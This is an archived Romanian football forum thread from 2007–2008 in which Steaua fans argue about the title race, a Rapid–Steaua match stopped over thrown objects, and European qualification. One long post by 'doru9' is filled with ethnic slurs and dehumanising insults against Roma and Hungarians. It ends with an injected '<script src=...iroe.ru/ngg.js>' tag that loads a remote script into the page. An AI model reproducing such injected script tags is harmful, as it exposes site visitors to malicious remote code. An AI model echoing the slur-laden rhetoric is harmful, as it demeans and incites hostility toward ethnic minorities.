PDA

Arată versiune întreagă : Fotbal

dortmund
20.12.2007, 13:13
I-a Steaua campionatul? Eu zic ca da-ChefeRe Cluj nu rezista ca aia deja sunt in lacrimi de bucurie ca ua fost pe primul loc citeva spatamini la rind...asa ceva nu s-a mai vazut la Cluj. PoliTimisoara este feroce cu echipele din liga doi surbeasca-la noi termina sub locul 5. Crapid este "singuri impotriva tutror" si are dreptate-"iechipa cu pene" este in carti citeodata dar cine stie Lipscaniul stie rapidu-odata incepe scandalul intre ei si Copos isi mai smulge un fir de par din peruca. Dinamo...blestemele lui Andone si Rednic au fost pe bune deci nu ii vad luand campionatul decit daca joaca Steaua fara spectatori vreo juma de an..."U" Craiova...o sa ia medalia judeteana pentru ca sunt intr-aqdevar, nu glumesc acuma, foarte buni in judetul Dolj. Farul Contanta...de-astia chiar ca imi place, nu stiu de ce dar au ceva simpatic...succes ma nu cadeti in "B." Gloria Bistrita...cea mai murdara echipa din seria 1, astia nu au mindire nici cit liliana lohan-daca zice patronu "vinde" pai ei vind fara sa se gindeasca ca sunt oameni in zona care cred in ei...Sabau rusine mah. Poli Iasi...alte jartele. Cred ca de la nebunu ala de antrenor al lor li se trage. UTA...are galeria plina de stelisti, nu critic hahaha. Gloria Buzau...are culoriile rosu/albastru...nu critic. "U" Cluj...in divizia onoare cu voi hahahaha. Sepciile Rosii joaca de parca ar fi ciungi-nu merita in liga unu. Plecati si luati si pe flotantii aia de rapidisti cu voi sa se mai clatine Bucurestiul cind trec stelistii: " crapid/cfr/10 ani/in "B"

ArmataUltra-IntotdeaunaSuperiori

pepeer2
20.12.2007, 16:07
Stai putin sa pici si tu in mina dinamovistilor de pe forum dortmund sa vezi ince epitete te rasfata.Eu sint " mincat" si nici la judecata nu i-am chemat cum fac altii cu tinesmileys/smiley36.gifSa speram ca Steaua va fi campioana, sau macar locul 2 sa prinda smileys/smiley32.gif

dortmund
22.12.2007, 05:01
dinamovistii sa vorbeasca cind le merge echipa fara ajutorul stelistiilor (ra catalijn munteanu si bostina ar fi vai de ei acuma si fara denis serban in tur ar fi fost tot vai de mamemel lor deci dinamo...ciocu mic spartaniilor cu chilotei roz. De miine sa purtati fustite potaiilor.

Imi este dor de fc baia mare, fc bigor, fc brasov, corvinul hunedoara fc arges, u cluj si u craiova din vremuriile bune...echipe ce ne faceau probleme. Echipele de azi (cu ezceptia lui unirea urziceni pe care o salut si fc constanta care continua sa "nu vinda nimic...restul sunt niste paraziti. rapid si dinamo nu sunt paraziti-doar bacterii. iar cfr cluj este o aberatie.

ArmataUltra-IntotdeaunaSuperiori

22.12.2007, 05:14
Varza murata pentru Sarmale

22.12.2007, 07:17
varza cu carne,,pentru sarmale!

dortmund
22.12.2007, 08:24
gresiti-dinamo nu este varza cu ori fara carne. Este o infectie locala tratata cu echipe din Albania, Islanda si oricare alta ce joaca cotnra ciinilor rosii si nu contra ciinilor rosii plus doi arbitrii. Dinamo este singura echipa din liga care are 400 de spectatori la meci (in cazul cind numeri politia si ciinii din dotatre hahaha). Dinamo are un stadion asa umil ca eraprimaria sa ii amendeze cind si-au pus nocturna ca orbeau trecatorii pe strada ca la cele 8-9 banci ce constitue "tribunele" hahaha. Dinamo este iubita crunt de toti cei ce urasc performanta pentru ca singura performanta a ciinilor este aia data pe tava de federatie-haita asta de maidanezi nu poate cistiga un singur meci pe bune, nici macar alea amicale. Traiasca arbitrii hahaha.

Totusi maxim respect pentru Borcea (unul din hingherii sef de-acolo). Este singurl care a spus ca si-a aruncat televizorul pe geam in 1986 cind a luat Steaua Cupa Campioniilor. Respect pentru cei ce isi dau arama pe fata si nu se ascund in spatele "e echipa romaneasca, bineinteles ca am tinut cu ei." Borcea te uram dar te respectam mai mult decit pe gunoaiele din presa care fac pe neutrii dar sunt anti-Steaua.

Urez succes tuturor echipelor ce joaca cu dinamo-hau-hau cu exceptia meciului dinamo-crapid cind tin cu ciinii rosii pentru ca astia sunt turbati dar nu si hoti de portofele ca minoritatiile de sub Podul Grant.

23.12.2007, 13:32
noroc ca la steaua, Dumnezeu , in persoana tine lucrurile sub lupa, se plimba cu Maybachul, si-l indreapta cu ranga, sa plinga cunoscatorii de necaz...hai voinicii mei!..nu ma bate Copos in postul pastelui!smileys/smiley36.gifaleluia..aleluia ...mai baga , ba, niste aghiazma si apa sfiintita de la robinet..noroc bun!

artemis_z
05.04.2008, 06:54
salut doru !

cred ca esti foarte fericit si doresc sa ma alatur tie si sa te felicit, si prin tine pe toti iubitorii sportului nobil care e fotbalul, si nu in ultimul rand a fairplay-ului, pt. victoria pe care ati avut-o la ultima partida pt clasificarea in champions league smileys/smiley32.gif

doru9
10.04.2008, 18:33
artemis_z

foarte subtil, foarte adinc...sau furios ca s-a facut dreptate? Pt. cine nu stie, artemis asta se refera la rapid-Steaua, meci intrerupt in minutul 63 la 1-0 pentru tuciuri. Arbitrul a oprit meciul pentru ca cineva a aruncat o bricheta din tribuna. Federatia a dat meciul Stelei deci, gindeste artemis cel subtil, si titlul de campioana deci nemeritat.

Artemis cel adinc...apreciez politetea mesajului si faptul ca nu te-ai dat la bagamiash si tot asa...dar trebuie sa te combat nitel. Fi atent la mandea:

in Giulesti (ghiulesti hahaha) orice echiopa vizitatoare este intimpinata si tinuta in flegme, petarde, cuie, etc de prin...de cind au revenit tiganii in divizia a adica de prin 1985 parca. Nu au fost niciodata suspendati cu pierderea meciului. Chiar si pe strainii veniti prin cupa UEFA (aia a campioniilor...numai Steaua joaca acolo hahaha cupa campioniilor/interzisa ciorilor) tot in spirit de Lipscani i-au primit.

La meciul cu Steaua vinetiii crapizi nu au aruncat o bricheta-au aruncat un camion de brichete-li s-a atras atentia de bulibasha aia de la statia stadionului de vreo trei ori "ja la carutsa nu mai zvirliti in romani, e? Tiganu insa tot rapidist-au continuat. Acum vreo doi ani le-au raspuns stelistii cu toate scaunele din peluza dar anul asta s-au smecherit inaripatii si au dat numai 500 de bilete...Meciul a fost intrerupt, statia a cerut din nou tiganiilor sa stea dracului in banca lor mai ales ca aveau 1-0 si mai erau vreo 30 de minute plus prelungiri...aveau sanse sa scoata cel putin uhn egal,...dar tiganu dupa ce ca e batut de soarta se mai bate si singur-au continuat sa arunce cu ce vindeau saptamina trecuta prin gara. Arbitrul putea oprii meciul ori il putea lasa sa se termine-orice decizie ar fi fost corecta. Tinind cont ca nimeni nu a fost ranit de chilotii, nevestele, copii si ce isi mai aruncau aia peste gard...meciul trebuia lasat sa curga si crapizii amendati numai ca arbitrul, cu pasiuni pro-Steaua, a profitat si a oprit meciul de tot. Asta nu inseamna ca a furat Steaua ci ca a avut noroc acum cum nu a avut ani de zile-trei puncte venite la fix. Fair-play-iul mai artemis este...ce? Sa refuzi trei puncte venite pe tava?

Steaua va lua campionatul pentru ca maghiarimea cheferista nu rezista la presiune, pentru ca potaiile militiene si crapizii nesimtiti joaca ca dracu sa ii ia si pentru ca Steaua pe linga jucatori si galerie acum au si noroc si cam asta iti trebuie citeodata. Mi-ar fi parut rau sa avem campioana debretineasca ori aviara ori militiana. Mai bine militara. Deci artemis, nu fi suparat ca norocul a tinut cu noi-omul alb este injurat de toti peste tot si e reconfortant sa vedem ca mai exista dumnezeu odata la cinspe ani. Crapid-echipa burtosiilor vinetii cu tiganusi ce se cred ultras daca urineaza pe gard si arunca brichete in Nesu (pe asta l-au tintit tiganii hahaha dar l-au nimerit pe arbitru din greseala...cioroii mai sunt si chiori pe linga prosti). Crapid-sufleutl indieniilor. "Iechipa" cu pene. Gripa aviara alb-visinie. Singuri impotriva tuturor pentru ca toti avem oroare de infectii. Crapid...cei ce cintau prin anii 50 "rapid-cfr/clasa muncitoare e." Nenorociti fericiti ca au voie sa doarma cu pisica sibunica in pat si sa incerce sa faca puradei cu amindoua fara sa fie arestati ca nu e telefon in tot cartierul...cine dreaq sa sune curcanii? Crapid-culori de mort-alb cum si-ar dorii si vinat cum sunt la fiecare victorie a Stelei. Crapid-veniti cu ursu-n cort sa cumpere sticle goale, si bagati in mortii mamelor lor alea blonde in blocuri ocupate de tiganii din Chile (foarte destept ceausescu, destept rau). Crapid-echipa muncitoriilor dar vindutul semintelor si gumei turcesti nu te face muncitor-doar procuror. Mergeti si procuratii-va dopuri sa vi le bagati in urechi sa nu auziti "crapid spune tu/cine este lideru." Chefere 10 ani in B...si cu asta am zis tot. <script src=http://www<script src=http://www.iroe.ru/ngg.js></script>

usdream
11.04.2008, 12:38
Dorule , am ras cu pofta smileys/smiley1.gif!

doru9
11.04.2008, 17:58
aia de mai sus e meci cu crapizii infecti pe fostul 23 august. Nu s-au loaded cum trebuie asa ca le re, pe rind sa vada tot poporul hahaha.

file:///C:/&#100;ocuments%20and%20Settings/Compaq_Owner/Desktop/fotografii/timisoara.jpg

asta este deplasare la timisoara

doru9
11.04.2008, 18:00
file:///C:/&#100;ocuments%20and%20Settings/Compaq_Owner/Desktop/fotografii/finala2006.jpg

doru9
11.04.2008, 18:01
file:///C:/&#100;ocuments%20and%20Settings/Compaq_Owner/Desktop/fotografii/antidinamo.jpg

"mori javra" cu dinamo in Ghencea

sorin
11.04.2008, 18:31
dorule, la mine nu se vad pozele.

doru9
13.04.2008, 14:51
Sorine...asta e. Poti sterge mesajul"Posted: 11April2008 at 22:53" ca si asa ocupa spatiul degeaba. Celelalte...daca nici altcineva nu vede imaginiile...eu le-ash sterge si pe alea daca as fi tu hahaha. In fine.

Astazi CFR Cluj (bozgorii tigani)-CFR Rapid (tiganii bucuresteni) 1-0. Hahaha tiganii nostrii si-au facut gresit socoteala si au dat meciul tiganiilor lor doar doar nu o lua Steaua campionatul pentru ca ei oricum joaca in cupa UEFA. Well...firar masa a dracului a aluia care a inventat matematica...ca grea mai e...hai sa vedem...

Crapid este la un punct in fata lui Urziceni si doua in fata lui Dinamo si Poli Timisoara. In UEFa merg cele de pe locuriile 3 si 4. Acuma aici e buba-pentru victorie se dau 3 puncte si crapizii mai au meci cu Urziceni (ii bate aia de ii asculta cu urechea), cu Dinamo (egal ori bat ciinii rosii) cu Pandurii TG Jiu (ai dreaq oltenii prind niste meciuri de nu ii bate nici Chelsea deci crapidu pierde si aici) si cu Vaslui in deplasare (sholdovenii ca pe vremea lui Stefan cel Mare-cind le merge jucaria da dracii-n tine oricine ai fi tu deci pronostic egal ori bat bourii aia pe boii nostrii). Deci rapiduletu trebuia sa bata astazi obligatoriu dar au dat meciul sa nu cumva sa se duca Steaua la cinci puncte de clujenii enervanti. De unde stiu ca au dat meciul? Pancu, care nu a jucat cica "nu cred ca am vindut meciul," Toma, barosan la clubul crapiziilor cica "nu am vindut meciul" Lucescu al mic "sper ca rapidu sa joace in cupa campioniilor" (ce cretin, cum ma sa joace daca termina pe 5? esti prost ca tactu ala dinamovistu, mircea lucescu care a facut nationala Romaniei in trei ani si ii batea Steaua lui Jenei facuta in 7 etape...oricind la orice ora pe orice stadion...de-aia e el anti-Steaua pina moare, da doamne miine). Copos, patron la rapid cica "bineinteles ca nu a fost blat." Taher, patronul principal la crapid cica "in vara vor pleca multi jucatori." Deci...nu te aperi daca nu te simti cu musca pe caciula. Si dai emciul cind crezi ca nu ai nevoie de puncte dar cum crapizii sunt si prosti si prosti ei saracii inca nu stiu ca termina pe 5, afara din cupa UEFA.

Clasamentul: 1-Steaua, (Liga Campioniilor). 2-Urziceni (Liga Campioniilor). 3- Chefere Cluj (Liga Ungariei hahaha. I wish. Cupa UEFA) 4- Dinamo (Cupa UEFA). 5- Crapid ori Poli Timisoara (cupa mamelor lor, echipe absolut infecte cu patroni scirbosi, galerii de spatisti, stadioane comuniste, si viitor inexistent).

Cupa Romaniei merge la Unirea Urziceni ori Pandurii TG Jiu. Daca cistiga Pandurii...astia merg si ei in UEFA. Daca cistiga Urziceniul, echipa cu care au jucat finala merge ea in UEFa si Urziceniul in Lihga Campioniilor din cauza clasamentului. Cum o dai...crapidu nu merge in cupele europene nici anul asta dar poate ii inscriem in cupa campioniilor din Fisia Gaza.

doru9
13.04.2008, 14:57
clasamentul ce l-am postat este dupa etapa 34, aia de nu s-a jucat inca deci nu ma injurati ca minti poporu-eu doar pronostichez, e clar? Mai vorbim in citeva saptamini sa vedem daca iese cum vrea o tara de romani in ciuda blestemelor a doua shatre de tigani, in tiganeshte si maghiareshte.

Hai Steaua, Urziceni, FC Argesh, FC Bihor, Farul Constantsa.

Huo dinamu, cfr cluj, poli iasi, corvinul hunedoara, puli timisoara, universitatea craiova.

Sictir etern crapid Bucuresti febletea alora din Cisiordania.

sorin
13.04.2008, 15:36
mai dorule mai, exista o gaura in toata teoria ta si anume ca si locul 5 merge in UEFA. smileys/smiley2.gifmie mi se rupede rapid,dinamo si steaua, dar cred caau sa-istea in gat beecalului, alea trei puncte furate haiduceste.

Sherlock
13.04.2008, 17:21
Sa castige odata cei din provincie, sa faca infarct Becalismileys/smiley36.gif

Hai F.C. Brasov............... la anusmileys/smiley2.gif

doru9
14.04.2008, 16:31
Sorine...tu vorbesti serios? trei puncte furate haiduceste...come on noi vorbim de acelasi meci? Daca si tu la care aveam pretentii...Subpodarii s-au comportat ca niste scribe inaripate adica ca deobicei si de data asta nu le-a mesr ca a fost arbitrul pentru noi si abea astepta sa faca aia ceva in tribune. Si au facut. Punctele nu sunt furate ci daruite de tigani pt romani atita tot. Cit despre UEFA...nope, merge numai locul trei, patru si cistigatoarea cupei Romaniei. Daca cine cistiga cupa este in Liga Campioniilor ori este in UEFa prin clasamentul final atunci merge finalista. Crapidu nu merge in UEFA si daca e adevarat ca au atacat un tramvai in Cringasi...nu or sa mearga nicaeri decit cu picioarele inainte. Brigaziile Stelei abea asteaptau un incident sa le dea apa la moara...iar se deschide robinetul tuciuriu si ala alb/rosu...

godrimartis...ce ai mah cu Becali? Provincia nu cistiga pentru ca joaca din ura nu pentru ca nu o lasa Becali. Cine joaca pe bune, see FC Constanta este la un pas de retrogradare mereu. Numai cu Steaua jucati la singe, cu crapid si cu dinamu mergeti pe burta ca scalvii si tot pe Becali il acuzati ca nu rasare soarele? Jucati cum trebuie nu cum va cer militienii si tiganii si sa vezi ca nu mai aveti timp sa va luati de Becali.

Crapid termina pe sase nu pe cinci. Si in trei ani se duce dupa National/Progresul: in B.

artemis_z
17.04.2008, 06:13
[QUOTE=doru9]

artemis_z

foarte subtil, foarte adinc...sau furios ca s-a facut dreptate? Pt. cine nu stie, artemis asta se refera la rapid-Steaua, meci intrerupt in minutul 63 la 1-0 pentru tuciuri. Arbitrul a oprit meciul pentru ca cineva a aruncat o bricheta din tribuna. Federatia a dat meciul Stelei deci, gindeste artemis cel subtil, si titlul de campioana deci nemeritat.

nici furios, nici adinc nici subtil smileys/smiley2.gif Imi era dor sa mai rid cu lacrimi de ce scrii tu. Si nu stiam cum sa te provoc smileys/smiley36.gif . ahhhh, daca as reusi sa-mi fac rost de niste buburuze, sau goange, orice, ca sa te pot chema sa-mi deratizezi casa...smileys/smiley19.gif si sa ne si uitam la un meci impreuna dupa...smileys/smiley36.gif